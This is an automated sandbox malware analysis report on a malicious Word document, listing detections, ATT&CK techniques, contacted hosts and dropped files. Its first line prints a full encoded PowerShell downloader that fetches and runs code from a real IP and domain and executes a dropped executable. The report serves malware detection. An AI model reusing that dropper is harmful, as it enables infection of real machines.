      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior

      Language, Device and Operating System Detection:

      barindex
      Yara detected Obfuscated PowershellShow sources
      Source: Yara matchFile source: attacker1.doc, type: SAMPLE
      Source: Yara matchFile source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, type: MEMORY
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsCommand and Scripting Interpreter21Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsPowerShell2Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information2LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsSystem Information Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      attacker1.doc58%VirustotalBrowse
      attacker1.doc54%ReversingLabsDocument-Office.Trojan.Valyria
      attacker1.doc100%AviraHEUR/Macro.Downloader.MRPU.Gen
      attacker1.doc100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP100%AviraHEUR/Macro.Downloader.MRPU.Gen
      C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP100%Joe Sandbox ML

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      fpetraardella.band2%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://176.32.350%Avira URL Cloudsafe
      http://176.32.35.16/704e.php4%VirustotalBrowse
      http://176.32.35.16/704e.php0%Avira URL Cloudsafe
      http://176.32.35.163%VirustotalBrowse
      http://176.32.35.160%Avira URL Cloudsafe
      http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas16%VirustotalBrowse
      http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://fpetraardella.band2%VirustotalBrowse
      http://fpetraardella.band0%Avira URL Cloudsafe
      http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gasPE0%Avira URL Cloudsafe
      http://176.32.35.16/704e.phpPE0%Avira URL Cloudsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      http://fpetraardella.band/xap_100%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      fpetraardella.band
      		unknown
      		unknownfalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://176.32.35.16/704e.phpfalse
      • 4%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000004.00000002.403229716.00000000024A0000.00000002.00020000.sdmpfalse
        		high
        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmpfalse
          		high
          http://176.32.35powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		low
          http://176.32.35.16powershell.exe, 00000004.00000002.405302772.0000000003867000.00000004.00000001.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gaspowershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.406785690.000000001B54F000.00000004.00000001.sdmptrue
          • 16%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.piriform.com/ccleanerpowershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmpfalse
            		high
            http://www.%s.comPApowershell.exe, 00000004.00000002.403229716.00000000024A0000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            		low
            http://fpetraardella.bandpowershell.exe, 00000004.00000002.405302772.0000000003867000.00000004.00000001.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gasPEpowershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            http://176.32.35.16/704e.phpPEpowershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://servername/isapibackend.dllcmd.exe, 00000002.00000002.408500730.0000000001BD0000.00000002.00020000.sdmpfalse
            • Avira URL Cloud: safe
            		low
            http://fpetraardella.band/xap_10powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            176.32.35.16
            		unknownRussian Federation
            		51659ASBAXETRUfalse

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:520834
            Start date:12.11.2021
            Start time:20:54:13
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 4m 41s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:attacker1.doc
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:6
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.bank.expl.evad.winDOC@5/16@1/1
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 1
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .doc
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
            • Execution Graph export aborted for target powershell.exe, PID 2984 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtQueryAttributesFile calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            20:55:14API Interceptor21x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            176.32.35.16Request12.docGet hashmaliciousBrowse
            • 176.32.35.16/704e.php
            Request12.docGet hashmaliciousBrowse
            • 176.32.35.16/704e.php
            Request12.docGet hashmaliciousBrowse
            • 176.32.35.16/704e.php

            Domains

            No context

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            ASBAXETRUCheat.exeGet hashmaliciousBrowse
            • 185.22.155.59
            SecuriteInfo.com.PUA.Tool.BtcMine.2412.5617.12339Get hashmaliciousBrowse
            • 45.147.201.62
            oqYSjv0q9v.exeGet hashmaliciousBrowse
            • 194.147.32.37
            Tony_Badger.htmlGet hashmaliciousBrowse
            • 46.29.167.251
            LYgkO009MS.exeGet hashmaliciousBrowse
            • 46.29.163.15
            YDYQ99f79X.exeGet hashmaliciousBrowse
            • 194.147.35.142
            _New_order_005637.xlsxGet hashmaliciousBrowse
            • 194.147.35.142
            Neeta_Marwah.htmlGet hashmaliciousBrowse
            • 185.22.152.230
            J9DkNGzJzU.exeGet hashmaliciousBrowse
            • 85.117.235.114
            24898127d1fda2a11a0f9531df9b0bea1cb977023c40d.exeGet hashmaliciousBrowse
            • 46.17.47.110
            9c9cdb438163a2e64adcb398a6f1f1abcdc81c1cf35ab.exeGet hashmaliciousBrowse
            • 85.117.235.114
            5rnpptJ7JP.exeGet hashmaliciousBrowse
            • 176.32.32.199
            WDhURqcvL6.exeGet hashmaliciousBrowse
            • 176.32.32.199
            BALANCE CONFIRMATION.docGet hashmaliciousBrowse
            • 176.32.32.199
            shipping doc.xlsxGet hashmaliciousBrowse
            • 176.32.32.199
            K3G3wljA6d.exeGet hashmaliciousBrowse
            • 176.32.32.199
            KF6ohwNBgU.exeGet hashmaliciousBrowse
            • 185.22.155.59
            Mel6191Yu8.exeGet hashmaliciousBrowse
            • 45.135.135.247
            zDcNvj6Z8J.exeGet hashmaliciousBrowse
            • 45.135.135.247
            P2inCKpO4S.exeGet hashmaliciousBrowse
            • 45.135.135.247

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43824A17.wmf
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
            Category:dropped
            Size (bytes):730
            Entropy (8bit):3.098760582869104
            Encrypted:false
            SSDEEP:12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
            MD5:8240B44F053C5ED87915946D7B08BC56
            SHA1:E7653365649AA3DDEE4A05A9298FBD05CC72212D
            SHA-256:FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
            SHA-512:BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
            Malicious:false
            Reputation:low
            Preview: ......m....................................................................@."Calibri.............................-.......-.......-.........................2.Q............... .6...................................-.......................-.......$...........................................-.......-.......................-.....................-.......$.......................-.......-...............'...............C............................@."Calibri.............................-.......-.......-........................@."Calibri.............................-.......-.......-.................................2...............C. .6...............'.........................."System......`................'......-.......-.........
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\529AC81A.wmf
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
            Category:dropped
            Size (bytes):730
            Entropy (8bit):3.098760582869104
            Encrypted:false
            SSDEEP:12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
            MD5:8240B44F053C5ED87915946D7B08BC56
            SHA1:E7653365649AA3DDEE4A05A9298FBD05CC72212D
            SHA-256:FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
            SHA-512:BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
            Malicious:false
            Reputation:low
            Preview: ......m....................................................................@."Calibri.............................-.......-.......-.........................2.Q............... .6...................................-.......................-.......$...........................................-.......-.......................-.....................-.......$.......................-.......-...............'...............C............................@."Calibri.............................-.......-.......-........................@."Calibri.............................-.......-.......-.................................2...............C. .6...............'.........................."System......`................'......-.......-.........
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63FA92EE.wmf
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
            Category:dropped
            Size (bytes):730
            Entropy (8bit):3.098760582869104
            Encrypted:false
            SSDEEP:12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
            MD5:8240B44F053C5ED87915946D7B08BC56
            SHA1:E7653365649AA3DDEE4A05A9298FBD05CC72212D
            SHA-256:FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
            SHA-512:BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
            Malicious:false
            Reputation:low
            Preview: ......m....................................................................@."Calibri.............................-.......-.......-.........................2.Q............... .6...................................-.......................-.......$...........................................-.......-.......................-.....................-.......$.......................-.......-...............'...............C............................@."Calibri.............................-.......-.......-........................@."Calibri.............................-.......-.......-.................................2...............C. .6...............'.........................."System......`................'......-.......-.........
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9361ED2C.wmf
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
            Category:dropped
            Size (bytes):730
            Entropy (8bit):3.098760582869104
            Encrypted:false
            SSDEEP:12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
            MD5:8240B44F053C5ED87915946D7B08BC56
            SHA1:E7653365649AA3DDEE4A05A9298FBD05CC72212D
            SHA-256:FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
            SHA-512:BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
            Malicious:false
            Reputation:low
            Preview: ......m....................................................................@."Calibri.............................-.......-.......-.........................2.Q............... .6...................................-.......................-.......$...........................................-.......-.......................-.....................-.......$.......................-.......-...............'...............C............................@."Calibri.............................-.......-.......-........................@."Calibri.............................-.......-.......-.................................2...............C. .6...............'.........................."System......`................'......-.......-.........
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9C4933D.wmf
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
            Category:dropped
            Size (bytes):730
            Entropy (8bit):3.098760582869104
            Encrypted:false
            SSDEEP:12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
            MD5:8240B44F053C5ED87915946D7B08BC56
            SHA1:E7653365649AA3DDEE4A05A9298FBD05CC72212D
            SHA-256:FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
            SHA-512:BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
            Malicious:false
            Reputation:low
            Preview: ......m....................................................................@."Calibri.............................-.......-.......-.........................2.Q............... .6...................................-.......................-.......$...........................................-.......-.......................-.....................-.......$.......................-.......-...............'...............C............................@."Calibri.............................-.......-.......-........................@."Calibri.............................-.......-.......-.................................2...............C. .6...............'.........................."System......`................'......-.......-.........
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7B48861.wmf
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
            Category:dropped
            Size (bytes):730
            Entropy (8bit):3.098760582869104
            Encrypted:false
            SSDEEP:12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
            MD5:8240B44F053C5ED87915946D7B08BC56
            SHA1:E7653365649AA3DDEE4A05A9298FBD05CC72212D
            SHA-256:FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
            SHA-512:BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
            Malicious:false
            Reputation:low
            Preview: ......m....................................................................@."Calibri.............................-.......-.......-.........................2.Q............... .6...................................-.......................-.......$...........................................-.......-.......................-.....................-.......$.......................-.......-...............'...............C............................@."Calibri.............................-.......-.......-........................@."Calibri.............................-.......-.......-.................................2...............C. .6...............'.........................."System......`................'......-.......-.........
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):20480
            Entropy (8bit):5.4273016557470175
            Encrypted:false
            SSDEEP:384:ntho8YySVCAnhthCiNZFOrMGQ63BpM0ju3zpedAbT:Ijv9TDdU6V3Fed
            MD5:93395C28C017486305A27249546947C8
            SHA1:9A1D5246CDADBFC80E3205C94238FA9EB2F9DE62
            SHA-256:3212515E43157EB5A77AE5F053C0649112ACB4A6871BD82A1B41C8B07DF272B8
            SHA-512:DD5CCED96AA3708666D917B9D3276EDEFBC6590CF19D0545D87C084A53BE8E3852AE2EB0613A8819AB8391BA47936806009F596D036A636ED5C64089A8B8392C
            Malicious:false
            Reputation:low
            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A519487F-70CA-4082-9E8E-8709DA5961D7}.tmp
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Reputation:high, very likely benign file
            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):64000
            Entropy (8bit):4.9674079732142165
            Encrypted:false
            SSDEEP:1536:p3JvxrOgpYPJ6EusMo42gZaFIZwGfa41:pf6gpYPJ6Eeo42gQImGfa
            MD5:995A8E6E4254C7F5891732F50F3C9CC4
            SHA1:D29B43C35E29ECC9AE7705FA9058F3BDB4831781
            SHA-256:DAEFC03F4F25AA537EBEC961A03D35AD39C0065C15BA5DB608189232BC092EB8
            SHA-512:8DCAF0DC8F42964EFD3ED98FD17AAC75C188DA389275643A5F8311A9DF9F8BAC1B798CAD981E03BB5C84F306CC6C388A0662C1E3F94F1C4E210EA0B7EA583776
            Malicious:true
            Yara Hits:
            • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP, Author: Florian Roth
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Reputation:low
            Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1.......3...4...5...6...7...@...9...:...;...<...=...>...?...2...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T.......q...W...k...Y...Z...[...\...]...f..._...`...a...b...c...d...e...X...g...h...i...j.......z...m...n...o...p...........s...t...u...v...w...x...y...l...
            C:\Users\user\AppData\Local\Temp\~DFDEFC6369C94FD53E.TMP
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\attacker1.LNK
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
